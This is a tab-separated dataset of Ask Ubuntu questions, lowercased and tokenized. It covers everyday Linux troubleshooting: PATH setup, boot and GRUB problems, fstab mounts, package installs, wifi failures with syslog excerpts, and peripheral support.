tlmgr : command not found but : /usr/local/texlive/2013/bin/x86_64-linux/tlmgr tlmgr : missing action ; try -- help if you need it . how can i set my path correctly that it takes texlive 2013 as default ?
325995	can not login as admin after vsftpd install	i have installed vsftpd and did some commands in terminal like chown root : root /home/myusername . and the next time i started my computer i could not log in as usual . an error message that erupts which says could not update iceauthority . plz help me i 'm stuck with this . i used this link for vsftpd install .
325998	how to enable auto security update in ubuntu 12.04 server	when i installed the ubuntu 12.04 server in my vm , i chose to manually update security . my question is how can i enable it again ? i know there are other packages that do auto update , but i 'm just looking for a simple solution to turn it back on .
326002	user : 1000-user # 1000	my hard disk ( boot sector ) is blown but the partition with my data in is good . when i loasd up ubuntu 13:05 livedisk , and move to my data partition , i notice that i have no access to the files and the permissions say that the files are owned by user : 1000-user # 1000 ok , i found `` ubuntu hardware partitions : how to set ownership of drive or partition ( internal & external hard disks ) '' followed the instructions very carefully but the system would not recognise 1000-user # 1000 - it may have been the hash sign it does n't like ? can anyone shed some light on this as i would like to get my data back before dumping the hard drive . if it is any help . i have moved the damaged disk to bay 1 from bay 0 and have a new drive in bay 0 ( which wo n't at present load ubuntu - but i 'm not worried about that at present .
326004	will canonical disable amazon ( and similar ) lenses by default	i 'm using 12.04 lts , partially because it 's stable and i need my machine to be stable and reliable . i also do n't wont to switch to newer versions of ubuntu because of shopping lenses . if i decide to install newer version of linux i 'll go for linux mint debian edition . i know that this lenses can be disabled or completely removed , but it makes me frustrated . linux was once famous for speed , stability and security , now canonical drives ubuntu off that course . i also understand that these lenses can be useful to someone , but at least ask us ( users ) about that on first start-up . or even better disable it by default . also , even if i want to keep that feature , i do n't want them all in one . i mean , if i want to search my local files i do n't want to search the internet at the same time . i know this can also be tweaked , but why not make it default ? i also decided not to support ubuntu edge because of this . so , may question is : will canonical disable amazon ( and similar ) lenses by default in some future releases ? this question is also appeal for canonical , please hear your users ! please make it configurable as possible . make detailed options for what is searched by default when i press super ( is it local files , apps , amazon , facebook etc or some combination of them ) . then it would be really great . ( sorry for that proposal at the end , i do n't know how to address to canonical other way . )
326006	how to remove windows and grub problem	at the moment i have ubuntu and windows 7 installed on my hard drive . since i do n't want to split my memory i want to remove windows , but i have no idea how to do it since i am new to linux . another problem i had after installing ubuntu was that the grub bootloader did n't work so i googled for a bit of advice , and now i think i have an older version of grub . is there a way to update it ? this is how my drive looks like at the moment :
326008	can i start a program from the terminal and make it launch visually in the background ?	if i open a program , like firefox , from the terminal then that program will get the focus of the gui . can i somehow open it so that it will run in the visual background and not pop up , blocking any current program i am working with ? my problem is that i use karma test runner which is run every time i edit my code . whenever that is done karma launches a browser which pops up in front of everything else on the screen which can be quite annoying . i am using ubuntu 13.04 .
326009	wubi shows error	i tried installing ubuntu 12.04 using wubi and it just does n't work , every time , without fail . i had the following scenarios : 1 . i downloaded only wubi.exe and ran it . the wubi installer started downloading the amd64.iso using torrent . but when there were just about 40 secs left to download , it shows an error 404 : file not found . 2 . i downloaded the iso file seperately and put it in the same folder as the wubi.exe . now there are two cases : a. offline : wubi says it could not download the metalinks file and hence can not download the iso . so i download the meta files separately and place them in the same directory . wubi shows the same error again . b. online : wubi works in same way as in case 1. and the same problem occurs as in case 1 . in short wubi does n't recognize the already downloaded iso in the directory at all . 3 . i burn the iso into a cd and run it . the same thing occurs as in case 2 . just in case that you know , i installed sp3 for win xp just before using wubi . while windows is running alright , is it possible that its causing conflicts for wubi ?
326012	how to completely remove ubuntu-restricted-extras	i recently installed ubuntu-restricted-extras but it is causing bugs in google chrome , and i want want to remove it . however , when i do it using sudo apt-get autoremove or sudo apt-get purge it does n't seem to be completely removed because when i was installing it , a lot of packages got removed and others got installed . my question is : how do i make things just like they was before installing ubuntu-restricted-extras ? thanks .
326015	could not mount /dev/sdc1 but i do n't have such a drive !	before you crucify me for saying something incorrect , i am an absolute beginner . thanks for your patience . i m on 12.04 every time i boot there are two things that appear . the first one is that /dev/sdc1 could n't no be mounted and then could not mount /dev/mapper/cryptswap1 . this is what the /etc/fstab looks like : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # swap was on /dev/sda7 during installation uuid=0af05a68-8fea-432e-974d-a4f75c172c12 none swap sw 0 0 /dev/sda2 /media/sda2 ntfs nls=iso8859-1 , ro , users , umask=000 , user 0 0 /dev/sda5 /media/sda5 ntfs nls=iso8859-1 , users , umask=000 , user 0 0 /dev/sdc1 /media/sdc1 ntfs nls=iso8859-1 , ro , users , umask=000 , user 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 my swap is in sda7 and my ext4 in sda6 . sda2 and sda5 are the windows drives . what do i have to change/do to avoid this problem that is slowing down my computer ?
326016	ubuntu 13.04 and kubuntu and windows 8 boot problem	i was installing windows 8 then i installed ubuntu 13.04 and burg for boot loader and everything was going great then i installed kubuntu and it changed the boot but still works and last thing which caused the problem , i used easy bcd on windows 7 to change the boot loader to the windows 8`s boot loader but it messed up everything , only windows 8 shows and i tried to add entries `` ubuntu and kubuntu `` but it does not work when i select on start up i tried many things using live cd of ubuntu and kubuntu but nothing work . so please help .
326017	how do i set up my sd card reader and usb flash drives ?	i have just installed ubuntu 12.04.2 , but ca n't figure out how mount my sd card reader and flash drives to transfer files . i am new to this having used windows since the beginning of time . i have figured most other problems i have come across but i am stumped with this . any help would be greatly appreciated . thanks .
326019	sony walkman nwz-b173f 12.04 support	i bought this groovy little device for my daughters only to discover they did n't play nice with ubuntu . my main desktop runs 12.04 64bit . my secondary desktop runs 13.04 . did n't get recognised on either . it appeared in dmesg and syslog and the `` disks utility '' app , but the filesystem type was not recognised which seems to be why it did n't mount . after much searching etc , i 've figured out how to mount it . it 's a vfat partition . mount /dev/sdg /media/walkman ( i manually created the walkman directory ) took me awhile to figure this out as i normally mount scsi drives as something like sdg1 or sda2 ( depending on the partition ) so i 've got around the initial problem of not being able to transfer music across , but i 'm a little puzzled as to why this would not auto-mount . any thoughts out there ?
326023	sound converter on ubuntu gnome offers no option for converting audios to mp3	i often use sound converter to convert my audio files to mp3 and it works perfectly on ubuntu unity but when i move to ubuntu gnome there is no option for mp3 format . sound converter does show how to install a codec to enable the function but the codec has been already installed on my computer . how can i enable mp3 coverting , or is there any other software that works ?
326027	does ubuntu ( server ) go to sleep ? why does it take long to login ?	i have several ubuntu server ( 12.04 lts ) virtual machines . some are idle and some are processing background tasks , etc . however , when i try to login ( ssh ) to the servers , it often takes several seconds but subsequent login ( within a short amount of time ) are very quick which makes me think the server is going to sleep after a certain amount of idle time . ( this might be my virtual server [ esxi ] causing this , but i have n't found anything ... )
326028	error during `` starting system logging syslog-ng '' ubutu server	here the output when i try to install or upgrade something with apt-get : starting system logging syslog-ng error opening file for reading ; filename='/proc/kmsg ' , error='operation not permitted ( 1 ) ' error initializing source driver ; source='s_src ' , id='s_src # 1 ' error initializing message pipeline ; [ fail ] the problem comes out also when i try to start it manually with this command : sudo /etc/init.d/syslog-ng start . how can i solve it ?
326029	unique ids of pen drives	there are 5 pen drives of same make and model . once they are formatted , it becomes difficult to decide which one belongs to whom . is there anything unique about pen drives like firmware kind of thing which can establish their unique identity ? if so , how can it be discovered ? is it possible to update/modify the firmware to give it a unique personal unique identity .
326044	diy remote desktop to android smart phone	i am looking to create my own android app that will allow me to remotely control my home theater pc ( which is running ubuntu ) . i am aware that many programs like this already exist , but i would like to make my own as a learning exercise . i also want to add extra functionality such as shortcuts to open pandora or netflix and automatically log in . i am not sure where to start though . i am completely new to linux , and it seems the main forum is down right now . i know a bit about smart phone development , but i am unsure about the server side component . i would like to get started on this immediately though , can anyone provide me with some links where i could start learning about this task ? here are the current problems i need to solve : how to capture the screen data quickly and efficiently what compression format to use on the screen shots how to send image data over the network to a certain ip address
326053	will matlab run on ubuntu mobile ?	if ubuntu mobile allows you to run a desktop operating system on a mobile device , does that mean it is possible to install and run applications such as matlab ? thanks , mark
326054	unallocating or freeing some space to install another os	i would like to install another os besides ubuntu for this i need to have some space but i can not find how to unallocate space how to do it .
326057	can i run ubuntu 12.04 concurrently with windows 7 ?	i want to install ubuntu on my laptop . will i be able to install it without removing the windows 7 os . i would like both of them .
326060	how to mount a vdi file in ubuntu 13.10 ?	i 'm trying to mount a vdi file in ubuntu 13.10 . i tried to sudo apt-get install virtualbox-fuse but it complains about not finding the package . converting it to raw is not really an option for me , i do n't have enough free space .
326061	installing maas-dns on ubuntu 12.04	are there other additional steps after running sudo apt-get install maas-dhcp maas-dns ? do i need to touch configuration files ? ordinary dns and maas-dns in ubuntu 12.04 are the same ? i 'm new in linux based system and i saw some complex configuration for linux os ( eg opensuse ) . so i want to know whether or not ubuntu maas needs . thanks .
326062	how can i avoid maximum brightness settings upon every boot ?	whenever i boot ubuntu the display and keyboard brightness are reset to maximum . since i almost never need such high brightness settings , every boot includes an aftermath of excessive key pressing . i would be thankful if anybody could guide me to a solution to automate my key presses or apply new brightness settings automatically upon every boot . thank you for your consideration : )
326064	how can i fix `` e : some index files failed to download '' error when doing apt-get update ?	this is the error i get : e : some index files failed to download . they have been ignored , or old ones used instead . i type sudo apt-get update and that is what it tells me . please be a bit easy on me i 'm new to ubuntu . here is the full output of sudo apt-get update : http : //pastebin.com/bn17jq28
326071	skype not installing	skype is not installing in my ubuntu . sudo apt-get install skype giving following output . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : ia32-libs ( > = 20080808 ) but it is not going to be installed w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ maverick/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_maverick_partner_binary-amd64_packages ) w : you may want to run apt-get update to correct these problems e : unable to correct problems , you have held broken packages . please help
326079	delay before firefox starts downloading	i 'm running ubuntu 12.10 with xfce 4.10 . firefox version 20.0 . whenever i try to download any files ( eg , right-click and download , anything like that ) , there 's a significant delay ( ~15 seconds ) . it does n't matter how large the file is -- a 20kb file has a delay , and so does a 10mb file . i 've tried clearing out the list of previously-downloaded files , but that did n't help . i also have chromium installed , but it does n't have the same delay problem . any suggestions ? currently mounted drives/devices /dev/sda7 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda5 on /boot type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /home/xxxxxx/.private on /home/xxxxxx type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=xxxxxxxxxxxxxxxx , ecryptfs_fnek_sig=xxxxxxxxxxxxxxxx ) gvfsd-fuse on /run/user/xxxxxx/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=xxxxxx ) /dev/sda3 on /media/xxxxxx/8c4896fb4896e36e type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb1 on /media/xxxxxx/datapart1 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) this is a dual-boot windows 7/ubuntu 12.10 machine , and /dev/sda3 and /dev/sdb1 are the windows volumes c : and d : respectively .
326085	mouse middle click not working after using trackball	i had logitech marble mouse on my laptop , and i used this tutorial , successfully , https : //help.ubuntu.com/community/logitech_marblemouse_usb to make my trackball work properly ( middle click , scroll , back button ... ) now i am back to normal mouse which has just two extra buttons for back and forward , but it is not working properly . so now the mouse works , with the left and right click and scroll , but nothing else . the biggest problem is that now middle click is not working , which is extremely useful for copy/paste , and also two extra buttons that i have are not working ( for back and forward ) . can anybody help me with this problem ? i tried a few things , searched google , but nothing helps ... it is probably something about settings for trackball , but i do n't know how to put everything back to state before installing trackball . i am using ubuntu 12.04 ...
326087	logitech k350 keyboard and m510 mouse not working unless i unplug and replug dongle 20 times	i just installed the logitech k350 keyboard and m510 mouse not working unless i unplug and replug dongle up to 20 times . ( this is on ubuntu 12.04 , i tried this replacing an existing keyboard and mouse and also reinstalling the os ) i found a number of posts similar to this but the scenario was a little different , and the solution did not help . the best i got was run this in a start up script : rmmod hid_logitech_dj modprobe hid_logitech_dj i tried that ( as well as modprobe -r hid_logitech_dj ) and still have to unplug and plug the dongle several times . i also try variations of that , such as a for loop that runs that 10 , 20 and 50 times , i even set it to sleep for a couple seconds after each command . when running that script manually with the for loop i find it randomly either works or does n't work . ie . i can run it 10 times and 5 times i will have keyboard and mouse , and 5 times i will have to unplug and replug the dongle ( once or twice ) . the other thing i tried was , # 1 the startup script , and # 2 also a cronjob that would run every minute to run those commands , after 10 minutes , i did n't have keyboard or mouse . however when i rebooted and left the computer on over night , i had keyboard and mouse in the morning . does anyone know a reliable solution for this ? the best i have found is the startup script , the crontab , but even after about a 10 minutes i still have unplug and replug the dongle , which is n't a great solution , when you got an ssd harddrive for lightning fast boot times . tia
326088	email client compatible with yahoomail	is there any email client that can be configured with yahoomail ? or do we know of any trick that can be used to make it work with thunderbird ?
326089	problem installing ubuntu 13.04 alongside windows 8	i am able to install ubuntu alongside windows 8 and beforehand i partitioned my harddrive and have 500gb unallocated space that i would like to use for ubuntu . during ubuntu installation , it does not prompt me to select my partition and instead goes straight into installation . afterwards , when i startup my computer it boots straight into windows . i then used easybcd to install an mbr . now when i restart my computer windows boot shows up , but when i click ubuntu it gives me an error . when i enter confirm-securebootuefi into windows terminal i receive `` false '' , meaning that means my system has secure boot and is disabled . i feel that i have exhausted all options and i do n't know what to do now .
326093	boot terminal not working properly	i am having problems with my ubuntu 12.04 , it hangs at âchecking battery stateâ , but what is wierd is that when that stage is reached , i open up the terminal by ctrl+f5 , and ca n't run anything . sudo is not installed , apt-get is not installed , cant login to superuser , authentication fails
326094	slow menu and icon issue in the launcher with libreoffice 4.1	i 've updated via the official ppa to 4.1.0.4 . i 've noticed the menubar in libreoffice 4.1 takes quite long to populate and also when opening a file from nautilus or the dash it does not associate with the icon on the launcher . how can i fix this or revert back to the original ubuntu version ? thanks !
326095	how to share internet connection from usb wireless broadband using wifi ?	please i need help . objective : be able to create a wifi-hotspot on my laptop [ dell inspiron 5520 64-bit with ubuntu 12.04 lts ] and share the internet connection being supplied via my usb internet wireless broadband dongle [ zte reliance netconnect ] with my android smartphone and other laptops at home . progress so far : 1 . i am able to use my dongle conveniently after configuring it using wvdial . i tried setting up an `` new wireless network '' ad-hoc but the sharing did not work . in fact my phone was n't able to connect to this network . i saw other similar posts on askubuntu and most of them are based on sharing a `` wired '' connection which does n't help my case . in fact , one similar question was flagged duplicate even though the person had clearly mentioned he needs an answer for `` wireless '' connection such as myself . when i use `` iwconfig '' i get the following , is this correct ? $ iwconfig ppp0 no wireless extensions . eth0 no wireless extensions . eth2 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . how can i achieve this ? please someone guide me step-by-step . thanks : )
326096	size of the package	is there any way i can get the package size ? i.e . if i am doing any installation , how much package ( in mb 's ) size i have to download ? how can i know ? i know one way that is with : jai @ frank-jai : ~ $ sudo apt-get install gedit reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : gedit-common gir1.2-gtksource-3.0 libgtksourceview-3.0-0 libgtksourceview-3.0-common suggested packages : gedit-plugins the following new packages will be installed : gedit gedit-common gir1.2-gtksource-3.0 libgtksourceview-3.0-0 libgtksourceview-3.0-common 0 upgraded , 5 newly installed , 0 to remove and 0 not upgraded . need to get 985 kb of archives . after this operation , 10.0 mb of additional disk space will be used may i know the other ways ?
326102	remove all privileges from an user group and allow it to open only one program and read one directory	hi , i need an user group to only be allowed to use gthumb and read from only one folder/partition which i will decide . please can you let me know how to do this ?
326110	lubuntu on powerbook g4 not booting	trying the alternate install cd for lubuntu 12.10 for powerpc on an old powerbook g4 . the install process seemed to go just fine , but trying to boot it up afterwards , i get this screen : https : //dl.dropboxusercontent.com/u/24213190/error % 20screen.jpg at this point it 's frozen , and about 10 minutes later it just powers down . side note : if this is significant , originally tried the standard lubuntu install disc . the lubuntu logo shows up but eventually freezes and shuts down before the option screen appears .
326114	ubuntu 12.10 : no wifi after update on dell xps l502x w/ intel centrino wireless-n 1030	it had been months since i had booted my ubuntu partition so i fired it up yesterday evening and immediately ran a `` sudo apt-get update & & sudo apt-get upgrade '' . the update apparently finished without issue and asked me to reboot . as i had some other business to do i shut the laptop down and booted on windows instead for the rest of the night . today i rebooted on ubuntu to find out that the wifi adapter wo n't connect to my box anymore . i can see the list of the available wifi networks and the adapter keeps trying to connect to my box but each time i see the spinner icon spin for a while and it ends with a `` wireless network disconnected '' toast notification . thanks a lot for your help , thomas here are the results from a few commands , please ask if you need me to run anything else : $ lspci -vvnn | grep network 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ 8086:008a ] ( rev 34 ) $ lspci -vvnn ( relevant excerpt ) 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ 8086:008a ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 1030 bgn [ 8086:5325 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- kernel driver in use : iwlwifi kernel modules : iwlwifi excerpt from syslog showing about 2 full consecutive attempts at connecting jul 29 18:12:37 qwindoo networkmanager [ 923 ] : auto-activating connection 'livebox-7435 ' . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) starting connection 'livebox-7435' jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0/wireless ) : access point 'livebox-7435 ' has security , but secrets are required . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0/wireless ) : connection 'livebox-7435 ' has security , and secrets exist . no new secrets needed . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : config : added 'ssid ' value 'livebox-7435' jul 29 18:12:37 qwindoo networkmanager [ 923 ] : config : added 'scan_ssid ' value '1' jul 29 18:12:37 qwindoo networkmanager [ 923 ] : config : added 'key_mgmt ' value 'wpa-psk' jul 29 18:12:37 qwindoo networkmanager [ 923 ] : config : added 'psk ' value '' jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : config : set interface ap_scan to 1 jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : disconnected - > scanning jul 29 18:12:37 qwindoo wpa_supplicant [ 1261 ] : trying to authenticate with 5c:33:8e:8e:33:66 ( ssid='livebox-7435 ' freq=2437 mhz ) jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : scanning - > authenticating jul 29 18:12:37 qwindoo kernel : [ 1787.825723 ] wlan0 : authenticate with 5c:33:8e:8e:33:66 ( try 1 ) jul 29 18:12:37 qwindoo wpa_supplicant [ 1261 ] : trying to associate with 5c:33:8e:8e:33:66 ( ssid='livebox-7435 ' freq=2437 mhz ) jul 29 18:12:37 qwindoo kernel : [ 1787.828775 ] wlan0 : authenticated jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : authenticating - > associating jul 29 18:12:37 qwindoo kernel : [ 1787.836444 ] wlan0 : associate with 5c:33:8e:8e:33:66 ( try 1 ) jul 29 18:12:37 qwindoo kernel : [ 1787.840676 ] wlan0 : rx reassocresp from 5c:33:8e:8e:33:66 ( capab=0x431 status=0 aid=2 ) jul 29 18:12:37 qwindoo kernel : [ 1787.840686 ] wlan0 : associated jul 29 18:12:37 qwindoo wpa_supplicant [ 1261 ] : associated with 5c:33:8e:8e:33:66 jul 29 18:12:37 qwindoo kernel : [ 1787.845878 ] cfg80211 : calling crda for country : fr jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : associating - > 4-way handshake jul 29 18:12:37 qwindoo kernel : [ 1787.854158 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854169 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854175 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854181 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854186 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854191 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854196 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854202 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854206 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854212 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854217 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854223 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854227 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854233 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854237 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854243 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854247 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854253 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854258 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854263 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854268 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854273 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854278 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854284 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854288 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:12:37 qwindoo kernel : [ 1787.854294 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854301 ] cfg80211 : regulatory domain changed to country : fr jul 29 18:12:37 qwindoo kernel : [ 1787.854305 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jul 29 18:12:37 qwindoo kernel : [ 1787.854311 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854316 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854320 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 29 18:12:37 qwindoo kernel : [ 1787.854325 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) jul 29 18:12:37 qwindoo wpa_supplicant [ 1261 ] : wpa : key negotiation completed with 5c:33:8e:8e:33:66 [ ptk=ccmp gtk=tkip ] jul 29 18:12:37 qwindoo wpa_supplicant [ 1261 ] : ctrl-event-connected - connection to 5c:33:8e:8e:33:66 completed ( reauth ) [ id=0 id_str= ] jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : 4-way handshake - > completed jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'livebox-7435 ' . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) jul 29 18:12:37 qwindoo networkmanager [ 923 ] : dhclient started with pid 5199 jul 29 18:12:37 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . jul 29 18:12:37 qwindoo dhclient : internet systems consortium dhcp client 4.1-esv-r4 jul 29 18:12:37 qwindoo dhclient : copyright 2004-2011 internet systems consortium . jul 29 18:12:37 qwindoo dhclient : all rights reserved . jul 29 18:12:37 qwindoo dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jul 29 18:12:37 qwindoo dhclient : jul 29 18:12:37 qwindoo networkmanager [ 923 ] : ( wlan0 ) : dhcpv4 state changed nbi - > preinit jul 29 18:12:37 qwindoo dhclient : listening on lpf/wlan0/ac:72:89:45:2e : fa jul 29 18:12:37 qwindoo dhclient : sending on lpf/wlan0/ac:72:89:45:2e : fa jul 29 18:12:37 qwindoo dhclient : sending on socket/fallback jul 29 